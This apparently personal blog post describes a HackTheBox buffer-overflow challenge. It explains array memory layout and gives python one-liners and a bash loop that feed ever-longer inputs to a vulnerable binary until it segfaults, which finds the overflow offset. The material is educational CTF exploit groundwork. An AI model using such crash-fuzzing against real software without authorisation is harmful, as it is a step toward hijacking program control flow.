Calculating Byte-offsets for Buffer Overflow Attacks
Buffer overflows are pretty neat.
I recently came across a challenge on HTB where we were given a simple binary, that took in a user input and spit it right back out at us. Initially I used GHIDRA
to try and dig through the binary for string values that might be useful (there weren’t any). After some browsing of the disassembled code, we see a function called flag()
being stored on the stack. However, this function is never called by main()
so even though we’re typing an input for the program, it’s not actually doing anything with it other than just spitting it right back out. However, the function that takes our input uses insecure C-functions like gets
and from GHIDRA
you can see there’s a character array declared for an input buffer with a defined size of 180.
A “brief” tangent about arrays, and memory
Without going too deep into programming (or computer architecture), there’s an important fact to remember. An “array” is really just a contiguous block of memory, with it’s starting point being the memory address of the first element in the array. The variable name we assign to the array is really just a label representing a pointer to that first element’s memory address. High-level abstracted languages like C or C++ allow us to iterate through an array with index notation - e.g. arr[i]
- to access the contents of the array at that index. What’s happening at the hardware level is, we’re using the base address of the array (lets say 1000) and then adding an offset (i*n
, where n is the size of the array’s data type). So in short, arr[1]
is really just shorthand for the value stored at memory address 1000 + (1*n)
.
Why’s this important?
C is an incredibly powerful language. It allows us to interact directly with hardware, but it comes at the price of not having good checks in place to prevent us from doing anything dumb. One of the dumb things we can do, is access an out-of-bounds memory address using arrays. In this case, we have an array size of 180 characters, but what happens when we start using inputs that are over 180? Eventually, we’re going to cause the program to crash with a segmentation fault. In simple terms, we try to access a part of memory that we shouldn’t and the computer gets angry at us and kicks us out.
Finding the point at which a program will encounter a segmentation fault.
I’m not going to explain buffer overflows in this post, just try and tie together everything I’ve written about and why it’s relevant. Finding the point in memory at which a segfault occurs is really important in the process of performing a buffer overflow attack. However, we might not always have access to cool tools like gdb
or GHIDRA
that allow us to visualize a program’s logic. So i thought to myself, how could I figure out what byte offset I would need to get the program to go where I want it to go in memory (our goal being that flag()
function).
Imagine we have a program, vuln
, and it only takes in an input. We can use something like python3 -c "print('A' * 69)" | ./vuln
in order to generate a “payload” of 69 A’s to use as our input. Since our input buffer can handle 180 characters, this program will execute properly and exit without error. However, what happens if we do python3 -c "print('A' * 181)" | ./vuln
which is 1 more character than our buffer? Huh… it still works… The same will happen at 182 and 183, but when we hit 184, we get the program to crash - so 184 is the offset we’d need to use.
What if the buffer is really big or we don’t know the buffer’s size limit? How can we test in an efficient way without guessing for hours? That’s where I thought to just automate it with a script in bash.
Using Shell Exit-codes
Okay so basically, any time we run a command in linux we can echo $?
immediately after to get the program’s exit code (even something as “simple” as echo is a program). If the program executes and exits gracefully, the exit code, $?
, will return 0
. If it doesn’t exit properly, $?
gets set to some non-zero value. In order to determine what that exit code is, we can just do something super obnoxious like set a high value to start (e.g. python3 -c "print('A' * 4000000000000000000000)" | ./vuln
). After running that, we can echo $?
to get our exit code - in the case of this challenge, it happened to be 139
. Using that knowledge I came up with this script that will break once it gets an exit code of 139 back - signalling to us we hit the seg fault we were looking for.
#!/bin/bash
n=0
while true
do
let n=$n+1
python3 -c "print('A' * $n)" | ./vuln &> /dev/null
if [ $? == 139 ]; then
echo "Offset = $n"
break
fi
done
Hope this is useful to anyone else getting started with buffer overflows. Really it’s about trial and error, and this is the starting point. You’d still need to fill the remaining bytes of the buffer in a manner that allows us to overwrite the return address to exit the program from the flag function. Remember, the goal of buffer overflows is to use vulnerable functions in order to overwrite the return address and get the binary to go where we want it to go, and execute the code we want it to.